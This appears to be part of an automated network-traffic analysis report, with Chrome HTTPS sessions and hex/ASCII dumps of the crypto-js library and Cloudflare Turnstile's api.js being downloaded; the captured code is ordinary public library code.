                                              2024-12-18 22:41:48 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                              Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.449762104.17.25.144434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:41:48 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                              Host: cdnjs.cloudflare.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:41:48 UTC957INHTTP/1.1 200 OK
                                              Date: Wed, 18 Dec 2024 22:41:48 GMT
                                              Content-Type: application/javascript; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Access-Control-Allow-Origin: *
                                              Cache-Control: public, max-age=30672000
                                              ETag: W/"61182885-40eb"
                                              Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                              cf-cdnjs-via: cfworker/kv
                                              Cross-Origin-Resource-Policy: cross-origin
                                              Timing-Allow-Origin: *
                                              X-Content-Type-Options: nosniff
                                              CF-Cache-Status: HIT
                                              Age: 17563
                                              Expires: Mon, 08 Dec 2025 22:41:48 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zz0n%2BOWRoDuY0Xpo1XyATBj%2FByW3kIxyWZJGRzjdMcBD1ABfR9u8%2FfguxxJzaUd2u1ntUafa4g0S0Pir6zO4Xm7yy7sx3rpMrRS96eV9srn1T8qS24fVtHTKcfWIECS65zk6UByA"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=15780000
                                              Server: cloudflare
                                              CF-RAY: 8f42a996186e78d6-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-12-18 22:41:48 UTC412INData Raw: 33 39 37 38 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                              Data Ascii: 3978!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                              2024-12-18 22:41:48 UTC1369INData Raw: 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74
                                              Data Ascii: globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.creat
                                              2024-12-18 22:41:48 UTC1369INData Raw: 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 74
                                              Data Ascii: ll(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)t
                                              2024-12-18 22:41:48 UTC1369INData Raw: 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b 61
                                              Data Ascii: of t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a
                                              2024-12-18 22:41:48 UTC1369INData Raw: 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 3f
                                              Data Ascii: r t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?
                                              2024-12-18 22:41:48 UTC1369INData Raw: 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d 3e
                                              Data Ascii: r(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>
                                              2024-12-18 22:41:48 UTC1369INData Raw: 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e
                                              Data Ascii: t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:fun
                                              2024-12-18 22:41:48 UTC1369INData Raw: 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52
                                              Data Ascii: rAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQR
                                              2024-12-18 22:41:48 UTC1369INData Raw: 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e
                                              Data Ascii: sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this.
                                              2024-12-18 22:41:48 UTC1369INData Raw: 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35
                                              Data Ascii: m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[5


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.449763104.18.95.414434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:41:49 UTC383OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                              Host: challenges.cloudflare.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:41:50 UTC471INHTTP/1.1 200 OK
                                              Date: Wed, 18 Dec 2024 22:41:50 GMT
                                              Content-Type: application/javascript; charset=UTF-8
                                              Content-Length: 47692
                                              Connection: close
                                              accept-ranges: bytes
                                              last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                              cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                              access-control-allow-origin: *
                                              cross-origin-resource-policy: cross-origin
                                              Server: cloudflare
                                              CF-RAY: 8f42a99ff86642cd-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-12-18 22:41:50 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                              Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                              2024-12-18 22:41:50 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                              Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                              2024-12-18 22:41:50 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                              Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                              2024-12-18 22:41:50 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                              Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                              2024-12-18 22:41:50 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                              Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
